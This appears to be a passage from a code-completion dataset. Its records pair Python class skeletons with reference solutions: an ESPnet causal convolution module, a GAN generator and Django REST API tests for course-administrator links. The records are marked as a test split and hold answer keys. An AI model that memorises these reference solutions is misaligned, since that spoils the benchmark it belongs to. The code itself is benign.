kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.", "class_name": "CausalConv1d", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. 
dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000155", "length_bytes": 7246, "license_type": "permissive", "methods": [{"docstring": "Construct a CausalConv1d object.", "name": "__init__", "signature": "def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0)"}, {"docstring": "Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))", "name": "forward", "signature": "def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007325", "prompt": "Implement the Python class `CausalConv1d` described below.\n\nClass description:\n1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. 
dropout_rate: Dropout rate.\n\nMethod signatures and docstrings:\n- def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0): Construct a CausalConv1d object.\n- def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))", "prompted_full_text": "Implement the Python class `CausalConv1d` described below.\n\nClass description:\n1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\n\nMethod signatures and docstrings:\n- def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0): Construct a CausalConv1d object.\n- def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\n\n<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. 
(B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "revision_id": "bcd20948db7846ee523443ef9fd78c7a1248c95e", "skeleton": "<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. 
dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n", "source": "the_stack_v2_python_sparse", "source_path": "espnet/nets/pytorch_backend/transducer/conv1d_nets.py", "source_repo": "espnet/espnet", "split": "test", "star_events_count": 7242} {"blob_id": "5d755d25a57408a713ea354bad709ec6e61f0c12", "bodies": ["super(Generator, self).__init__()\nself.conv_dim = conv_dim\nself.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\nself.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\nself.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\nself.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)", "x = self.fc(x)\nx = x.view(-1, self.conv_dim * 4, 4, 4)\nx = F.relu(self.deconv1(x), 0.2)\nx = F.relu(self.deconv2(x), 0.2)\nx = self.deconv3(x)\nx = F.tanh(x)\nreturn x"], "bodies_text": "<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Generator", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim 
* 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000156", "length_bytes": 12896, "license_type": "permissive", "methods": [{"docstring": "Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer", "name": "__init__", "signature": "def __init__(self, z_size, conv_dim=32)"}, {"docstring": "Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005759", "prompt": "Implement the Python class `Generator` described below.\n\nClass description:\nImplement the Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, z_size, conv_dim=32): Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\n- def forward(self, x): Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output", "prompted_full_text": "Implement the Python class `Generator` described below.\n\nClass description:\nImplement the Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, z_size, conv_dim=32): Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\n- def forward(self, x): Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\n\n<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "revision_id": "b9b54564f94aadfc3c71ff513da0f05ef85d22a8", "skeleton": "<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network 
:return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Generator:\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "dl/pytorch/gan/face_gan.py", "source_repo": "xta0/Python-Playground", "split": "test", "star_events_count": 0} {"blob_id": "30f126b48c2c2c1b925fdb0453832f01e9b22b0a", "bodies": ["cls.endpoint = '/api/courseadmin/'\ncls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\ncls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\ncls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nrequest = APIRequestFactory().get(self.endpoint)\nforce_authenticate(request, user=self.superuser)\ncourse_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\nresponse = course_admin_view(request)\nself.assertEqual(len(response.data), 1)\ncourse_entry_data = response.data[0]\nself.assertEqual(course_entry_data.get('id'), course_admin.id)\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_200_OK)", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nrequest = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\nforce_authenticate(request, user=self.superuser)\ncourse_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\nresponse = course_admin_view(request, pk=course_admin.id)\ncourse_entry_data = response.data\nself.assertEqual(course_entry_data.get('id'), course_admin.id)\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_200_OK)", "self.client.force_authenticate(user=self.superuser)\nresponse = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\ncourse_entry_data = response.data\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), 
self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_201_CREATED)", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nself.client.force_authenticate(user=self.superuser)\nresponse = self.client.delete(f'{self.endpoint}{course_admin.id}/')\nself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\nwith self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)"], "bodies_text": "<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "class_docstring": "Тесты свзи 
администратора с курсом", "class_name": "CourseAdminTestCase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n 
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000157", "length_bytes": 33302, "license_type": "no_license", "methods": [{"docstring": "Данные для тесткейса", "name": "setUpTestData", "signature": "def setUpTestData(cls)"}, {"docstring": "Список связей администраторов с курсами", "name": "test_course_admin_list", "signature": "def test_course_admin_list(self)"}, {"docstring": "Получение связи администратора с курсом", "name": "test_get_course_admin", "signature": "def test_get_course_admin(self)"}, {"docstring": "Создание связи администратора с курсом", "name": "test_create_course_admin", "signature": "def test_create_course_admin(self)"}, {"docstring": "Удаление связи администратора с курсом", "name": "test_delete_course_admin", "signature": "def test_delete_course_admin(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_007272", "prompt": "Implement the Python class `CourseAdminTestCase` described below.\n\nClass description:\nТесты свзи администратора с курсом\n\nMethod signatures and docstrings:\n- def setUpTestData(cls): Данные для тесткейса\n- def test_course_admin_list(self): Список связей администраторов с курсами\n- def test_get_course_admin(self): Получение связи администратора с курсом\n- def test_create_course_admin(self): Создание связи администратора с курсом\n- def test_delete_course_admin(self): Удаление связи администратора с курсом", "prompted_full_text": "Implement the Python class `CourseAdminTestCase` described below.\n\nClass description:\nТесты свзи администратора с курсом\n\nMethod signatures and docstrings:\n- def setUpTestData(cls): Данные для тесткейса\n- def test_course_admin_list(self): Список связей администраторов с курсами\n- def test_get_course_admin(self): Получение связи администратора с курсом\n- def test_create_course_admin(self): Создание связи администратора с курсом\n- def test_delete_course_admin(self): Удаление связи администратора с курсом\n\n<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n 
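# exactly one CourseAdmin link was created above, so the list holds a single entry\n    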
self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n 